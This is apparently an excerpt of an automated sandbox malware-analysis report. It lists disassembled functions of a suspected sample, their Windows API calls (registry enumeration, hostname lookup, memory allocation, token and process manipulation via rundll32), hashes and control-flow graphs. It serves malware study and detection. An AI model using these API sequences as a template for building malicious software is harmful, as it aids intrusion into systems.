                                                                                          • Instruction Fuzzy Hash: 93F097B1900119FFEF019FA8CC498AE7BB9FB08351B504565FD25E2264D7329A209B90
                                                                                          APIs
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                          • lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeLoadlstrcpylstrlen
                                                                                          • String ID: Error$InstallTime
                                                                                          • API String ID: 2132864188-3993312925
                                                                                          • Opcode ID: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                          • Instruction ID: e8fad5b45eeb662e546af45f25a3999bf1724c4d36ffe5c36dea95d3d4dec653
                                                                                          • Opcode Fuzzy Hash: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                          • Instruction Fuzzy Hash: 9DE0BF31140648B7FF115F51CC46F9D3B5AEB187D6F108054FB08680A4DB7396A09789
                                                                                          APIs
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                          • gethostname.WS2_32(?,?), ref: 10003621
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeLoadgethostnamelstrlen
                                                                                          • String ID: Remark
                                                                                          • API String ID: 619171837-3865500943
                                                                                          • Opcode ID: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                          • Instruction ID: 39b077b3adc2da00c1cb4508d3157ec8a6411d10b118cb0f162994d28e94cfda
                                                                                          • Opcode Fuzzy Hash: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                          • Instruction Fuzzy Hash: BDE0B635240219BBEF125F91CC46F9E3F2AEB087D1F108014FB18681A5DB739660AB89
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A10
                                                                                          • memset.MSVCRT ref: 10003A1B
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A31
                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 10003A40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual$memcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 2542864682-0
                                                                                          • Opcode ID: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                          • Instruction ID: 4a5287acb012e3640f8314301f41164344c56cf0a301795e67bafcb82fb77477
                                                                                          • Opcode Fuzzy Hash: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                          • Instruction Fuzzy Hash: 82213871A00208AFEB11CF59CC81F9AB7F8FF44344F118459E9809B251D770AA50CB54

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:19.6%
                                                                                          Total number of Nodes:675
                                                                                          Total number of Limit Nodes:13
2234->2231 2237 dd3cfc 2234->2237 2235->2231 2240 dd38f0 12 API calls 2237->2240 2241 dd3d60 2238->2241 2243 dd3d10 2240->2243 2241->2152 2241->2153 2242 dd3cab 2242->2231 2243->2231 2245 dd3d85 2244->2245 2246 dd3e52 2244->2246 2247 dd3dad LocalAlloc 2245->2247 2248 dd3d93 _wtoi GetProcAddress 2245->2248 2246->2155 2246->2156 2246->2160 2247->2246 2250 dd3ddf WideCharToMultiByte 2247->2250 2248->2246 2251 dd3e4b LocalFree 2250->2251 2252 dd3dfb GetProcAddress 2250->2252 2251->2246 2252->2251 2254 dd3e1f GetProcAddress 2252->2254 2254->2251 2255 dd3e3c GetProcAddress 2254->2255 2255->2251 2273 dd3a51 CreateFileW 2256->2273 2259 dd3b2b GetCurrentProcess IsWow64Process2 2260 dd3b4a 2259->2260 2272 dd3b91 2259->2272 2261 dd3b56 2260->2261 2262 dd3ba1 RtlWow64IsWowGuestMachineSupported 2260->2262 2266 dd3b60 GetSystemDirectoryW 2261->2266 2261->2272 2265 dd3bb3 2262->2265 2262->2272 2263 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2264 dd3b9f 2263->2264 2264->2234 2264->2242 2267 dd3bbc GetSystemWow64Directory2W 2265->2267 2265->2272 2268 dd3b72 2266->2268 2267->2268 2269 dd3b76 PathCchAppend 2268->2269 2268->2272 2270 dd3bd1 Wow64EnableWow64FsRedirection memset GetCommandLineW CreateProcessW Wow64EnableWow64FsRedirection 2269->2270 2269->2272 2271 dd3c2e WaitForSingleObject CloseHandle CloseHandle 2270->2271 2270->2272 2271->2272 2272->2263 2274 dd3af9 2273->2274 2275 dd3a88 memset ReadFile 2273->2275 2276 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2274->2276 2277 dd3ab0 2275->2277 2278 dd3af2 CloseHandle 2275->2278 2279 dd3b07 2276->2279 2277->2278 2280 dd3abb SetFilePointer 2277->2280 2278->2274 2279->2259 2279->2272 2280->2278 2281 dd3acc ReadFile 2280->2281 2281->2278 2282 dd3aeb 2281->2282 2282->2278 2284 dd207c CreateEventW 2283->2284 2284->2182 2284->2185 2285->2187 2287 dd4d5f 2286->2287 2293 dd4dea 2287->2293 2302 dd64a6 2287->2302 2289 dd4dab 2290 dd64a6 2 API calls 2289->2290 2291 dd4dc9 2290->2291 2292 dd64a6 2 API 
calls 2291->2292 2292->2293 2294 dd64a6 2 API calls 2293->2294 2295 dd4fbd 2293->2295 2294->2295 2295->2189 2297 dd35a6 2296->2297 2298 dd64a6 2 API calls 2297->2298 2300 dd35f1 2297->2300 2298->2300 2310 dd3306 2300->2310 2303 dd63b2 __EH_prolog3_catch 2302->2303 2306 dd6aca 2303->2306 2305 dd63ca 2305->2289 2307 dd6adf malloc 2306->2307 2308 dd6aee 2307->2308 2309 dd6ad2 _callnewh 2307->2309 2308->2305 2309->2307 2309->2308 2311 dd3320 2310->2311 2312 dd33d8 2311->2312 2313 dd337e AcquireSRWLockExclusive 2311->2313 2314 dd3399 ReleaseSRWLockExclusive 2311->2314 2315 dd33a9 ReleaseSRWLockExclusive 2311->2315 2316 dd33b3 DecodePointer 2311->2316 2312->2196 2313->2311 2314->2311 2315->2316 2316->2311 2318 dd1f94 2317->2318 2319 dd1fb6 2318->2319 2321 dd201a _vsnwprintf 2318->2321 2319->2203 2319->2206 2322 dd203e 2321->2322 2322->2319 2874 dd24a7 2875 dd24af 2874->2875 2877 dd24be 2874->2877 2878 dd23be 2875->2878 2879 dd240d 2878->2879 2880 dd23f1 GetModuleHandleExW 2878->2880 2881 dd242d GetModuleFileNameA 2879->2881 2882 dd2405 2879->2882 2880->2879 2880->2882 2881->2882 2883 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2882->2883 2884 dd2493 2883->2884 2884->2877 2885 dd60a6 _XcptFilter 2887 dd45a0 2890 dd51ae 2887->2890 2891 dd51ca 2890->2891 2892 dd5207 CoResumeClassObjects 2890->2892 2894 dd5216 2891->2894 2895 dd51d9 CoRegisterClassObject 2891->2895 2893 dd45b6 2892->2893 2892->2894 2894->2893 2896 dd521f CoRevokeClassObject 2894->2896 2895->2891 2897 dd5203 2895->2897 2896->2893 2896->2896 2897->2892 2897->2894 2898 dd61a0 2901 dd6735 2898->2901 2900 dd61a5 2900->2900 2902 dd675e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2901->2902 2903 dd675a 2901->2903 2904 dd67ad 2902->2904 2903->2902 2903->2904 2904->2900

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0(?,00000000,00000000,00000000), ref: 00DD5932
                                                                                          • RtlSetSearchPathMode.NTDLL(00008001), ref: 00DD5945
                                                                                          • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 00DD5961
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?), ref: 00DD59BF
                                                                                          • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00DD59D1
                                                                                          • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00DD5A17
                                                                                          • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00DD5A38
                                                                                          • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00DD5A59
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 00DD5A98
                                                                                          • CreateActCtxWWorker.KERNEL32(?,?,?), ref: 00DD5AB5
                                                                                          • ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 00DD5AF3
                                                                                          • SetWindowLongW.USER32(?,00000000,00000001), ref: 00DD5B67
                                                                                          • GetWindowLongW.USER32(?,00000000), ref: 00DD5B77
                                                                                          • GetWindow.USER32(?,00000003), ref: 00DD5B89
                                                                                          • memset.MSVCRT ref: 00DD5BA7
                                                                                          • GetClassNameW.USER32(00000000,?,00000050), ref: 00DD5BB9
                                                                                          • CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00DD5BD7
                                                                                          • GetWindow.USER32(00000000,00000003), ref: 00DD5BE5
                                                                                          • GetWindow.USER32(00000000,00000004), ref: 00DD5BF0
                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 00DD5BFD
                                                                                          • SetWindowLongW.USER32(00000000,000000EC,?), ref: 00DD5C37
                                                                                          • NtdllDefWindowProc_W.NTDLL(?,0000001C,?,?), ref: 00DD5C56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$LongWorker$Path$Search$ActivateAttributesClassCompareFileHandleModeModuleNameNtdllProc_RelativeStringmemset
                                                                                          • String ID: $ $.manifest$IME$N$|
                                                                                          • API String ID: 1028207903-3161873098
                                                                                          • Opcode ID: 9ba832d05230ced030c03c6d92b8b228364e3f32d1a38ecdb2a157a7f927ebcb
                                                                                          • Instruction ID: d163846d0ce433a80e2aad4725ee87bf6032b46b8fc2fa7521a78cd8a62e07df
                                                                                          • Opcode Fuzzy Hash: 9ba832d05230ced030c03c6d92b8b228364e3f32d1a38ecdb2a157a7f927ebcb
                                                                                          • Instruction Fuzzy Hash: F791C171901729EFDB20AF64EC88FAAB7B8EB45321F144297F519E2390E77499448F70

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 51 dd4136-dd416b HeapSetInformation NtSetInformationProcess 52 dd416e-dd4177 51->52 52->52 53 dd4179-dd4195 call dd6953 52->53 56 dd41ab-dd41bb LocalAlloc 53->56 57 dd4197-dd41a6 AttachConsole 53->57 58 dd43a7-dd43ae 56->58 59 dd41c1-dd41cf call dd1ef1 56->59 57->56 60 dd43b6-dd43b7 ExitProcess 58->60 61 dd43b0 FreeConsole 58->61 64 dd41d5-dd41f1 call dd5695 59->64 65 dd43a0-dd43a1 LocalFree 59->65 61->60 64->65 68 dd41f7-dd4200 call dd40b1 64->68 65->58 71 dd422c-dd4231 68->71 72 dd4202-dd4218 LoadLibraryExW 68->72 75 dd425a-dd425f 71->75 76 dd4233-dd4242 call dd40f3 71->76 73 dd422a 72->73 74 dd421a-dd4228 GetProcAddress 72->74 73->71 74->71 78 dd4285-dd42b0 SetErrorMode call dd5911 call dd5d6a 75->78 79 dd4261-dd4271 call dd40f3 75->79 85 dd4248-dd4255 call dd3fe7 76->85 86 dd4393-dd4395 76->86 96 dd4357-dd436b call dd38f0 78->96 97 dd42b6-dd42e7 call dd3e5b 78->97 79->86 87 dd4277-dd4280 call dd37c3 79->87 85->86 88 dd439e 86->88 89 dd4397-dd4398 FreeLibrary 86->89 87->86 88->65 89->88 101 dd4370-dd4377 96->101 102 dd42e9-dd42ee 97->102 103 dd434b-dd4355 LocalFree 97->103 101->86 104 dd4379-dd437e 101->104 107 dd42f8-dd431b call dd3f6b call dd5c6c call dd40f3 102->107 108 dd42f0-dd42f4 102->108 103->101 105 dd438c-dd438d ReleaseActCtx 104->105 106 dd4380-dd4386 DeactivateActCtx 104->106 105->86 106->105 115 dd431d-dd432d call dd4072 107->115 116 dd4332-dd4338 107->116 108->107 115->116 118 dd433a-dd433b DestroyWindow 116->118 119 dd4341-dd4345 FreeLibrary 116->119 118->119 119->103
                                                                                          APIs
                                                                                          • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00DD414D
                                                                                          • NtSetInformationProcess.NTDLL ref: 00DD4162
                                                                                          • AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 00DD4199
                                                                                          • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00DD41B1
                                                                                          • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 00DD420E
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 00DD4220
                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00DD428A
                                                                                          • DestroyWindow.USER32(?), ref: 00DD433B
                                                                                          • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00DD4345
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00DD434F
                                                                                          • DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 00DD4386
                                                                                          • ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 00DD438D
                                                                                            • Part of subcall function 00DD37C3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00DD37D4
                                                                                            • Part of subcall function 00DD37C3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00DD19CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00DD37F0
                                                                                            • Part of subcall function 00DD37C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00DD3808
                                                                                            • Part of subcall function 00DD37C3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD381D
                                                                                            • Part of subcall function 00DD37C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00DD3866
                                                                                            • Part of subcall function 00DD37C3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3873
                                                                                            • Part of subcall function 00DD37C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD387A
                                                                                            • Part of subcall function 00DD37C3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00DD8420,?), ref: 00DD3897
                                                                                            • Part of subcall function 00DD37C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00DD38D9
                                                                                            • Part of subcall function 00DD37C3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00DD38E7
                                                                                          • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00DD4398
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00DD43A1
                                                                                          • FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 00DD43B0
                                                                                          • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD43B7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateDestroyErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWaitWindow
                                                                                          • String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
                                                                                          • API String ID: 3009286836-3890604504
                                                                                          • Opcode ID: fa50f8e8c9aeefbafc63bf4227e52440bc646e1c61ad61ca106a88905b40cc82
                                                                                          • Instruction ID: 30c940199d90c25254c6c33d3ff957bb261aff96a9135aa577e65fcec87ffbdd
                                                                                          • Opcode Fuzzy Hash: fa50f8e8c9aeefbafc63bf4227e52440bc646e1c61ad61ca106a88905b40cc82
                                                                                          • Instruction Fuzzy Hash: 5D616C71104301AFD710EF64DC59A6FBBEAEF88714F084A1AF995923A1DB31D909CB72

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 168 dd5d6a-dd5d9f NtOpenProcessToken RtlNtStatusToDosError 169 dd5dac 168->169 170 dd5da1-dd5daa 168->170 171 dd5dae-dd5db4 call dd5cf1 169->171 172 dd5dc7-dd5dce 169->172 170->169 177 dd5db9-dd5dc4 NtClose 171->177 174 dd5e3e-dd5e4e call dd61b0 172->174 175 dd5dd0-dd5dd2 172->175 175->174 178 dd5dd4-dd5dd6 175->178 177->172 180 dd5dd8-dd5ddb 178->180 181 dd5dfa-dd5dfd 178->181 180->181 182 dd5ddd-dd5df5 QueryActCtxW 180->182 183 dd5dff-dd5e02 181->183 184 dd5e08-dd5e1b NtOpenProcessToken 181->184 182->181 186 dd5df7 182->186 183->174 187 dd5e04-dd5e06 183->187 184->174 185 dd5e1d-dd5e38 NtSetInformationToken NtClose 184->185 185->174 186->181 187->174
                                                                                          APIs
                                                                                          • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00DD5D8E
                                                                                          • RtlNtStatusToDosError.NTDLL ref: 00DD5D95
                                                                                          • NtClose.NTDLL ref: 00DD5DBE
                                                                                          • QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 00DD5DED
                                                                                          • NtOpenProcessToken.NTDLL(000000FF,00000080,?), ref: 00DD5E13
                                                                                          • NtSetInformationToken.NTDLL ref: 00DD5E2F
                                                                                          • NtClose.NTDLL ref: 00DD5E38
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 3674487995-0
                                                                                          • Opcode ID: bdc5d08197e38a97721696a30432f1186d9844fb4e503878e79111ca4443ebc7
                                                                                          • Instruction ID: 803b0de59a95f6281fc78c6852dac1d22bf70489b389d7e0b6bad0fd236b4182
                                                                                          • Opcode Fuzzy Hash: bdc5d08197e38a97721696a30432f1186d9844fb4e503878e79111ca4443ebc7
                                                                                          • Instruction Fuzzy Hash: 11219636A01719ABDB209B949D49BBFBB79EB84721F150216F911F73D4DA309D04C7B0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 189 dd3c66-dd3c91 LoadLibraryExW 190 dd3c93-dd3c9e GetLastError 189->190 191 dd3d12-dd3d1b RtlImageNtHeader 189->191 194 dd3cdb-dd3ced 190->194 195 dd3ca0-dd3ca9 call dd3b09 190->195 192 dd3d1d-dd3d26 191->192 193 dd3d51 191->193 192->193 197 dd3d28-dd3d4b SetProcessMitigationPolicy 192->197 198 dd3d53-dd3d61 call dd61b0 193->198 196 dd3cf2-dd3cfa FormatMessageW 194->196 205 dd3cab-dd3cad 195->205 206 dd3cb2-dd3cd9 195->206 196->193 200 dd3cfc-dd3d10 call dd38f0 196->200 197->193 200->193 205->198 206->196
                                                                                          APIs
                                                                                          • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00DD3C87
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00DD3C93
                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 00DD3CF2
                                                                                            • Part of subcall function 00DD3B09: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00DD3B39
                                                                                            • Part of subcall function 00DD3B09: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00DD3B40
                                                                                            • Part of subcall function 00DD3B09: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00DD3B6C
                                                                                            • Part of subcall function 00DD3B09: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00DD3B87
                                                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00DD3D13
                                                                                          • SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 00DD3D4B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
                                                                                          • String ID:
                                                                                          • API String ID: 4162338769-0
                                                                                          • Opcode ID: e3a44e225d5a50a9ac0d7708a11cea3828a53e636b22e9756a9bb67d722fb39f
                                                                                          • Instruction ID: 0f783f0858713340a3098a40cf70d9450889ceecd0cf6a7055835b891a3f041b
                                                                                          • Opcode Fuzzy Hash: e3a44e225d5a50a9ac0d7708a11cea3828a53e636b22e9756a9bb67d722fb39f
                                                                                          • Instruction Fuzzy Hash: 942171B06413186EFB14DB259C89FFA7BBDEBD5740F14406AB509E6390DAB0CF448A72

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 228 dd5cf1-dd5d21 NtQueryInformationToken 229 dd5d4c-dd5d55 RtlNtStatusToDosError 228->229 230 dd5d23-dd5d27 228->230 233 dd5d57-dd5d5f 229->233 234 dd5d61 229->234 231 dd5d29-dd5d2d 230->231 232 dd5d4b 230->232 231->229 235 dd5d2f-dd5d44 NtQueryInformationToken 231->235 232->229 233->234 236 dd5d65-dd5d69 234->236 237 dd5d63 234->237 235->229 238 dd5d46-dd5d49 235->238 237->236 238->229 238->232
                                                                                          APIs
                                                                                          • NtQueryInformationToken.NTDLL ref: 00DD5D17
                                                                                          • NtQueryInformationToken.NTDLL ref: 00DD5D3C
                                                                                          • RtlNtStatusToDosError.NTDLL ref: 00DD5D4D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken$ErrorStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1049779487-0

                                                                                          Control-flow Graph

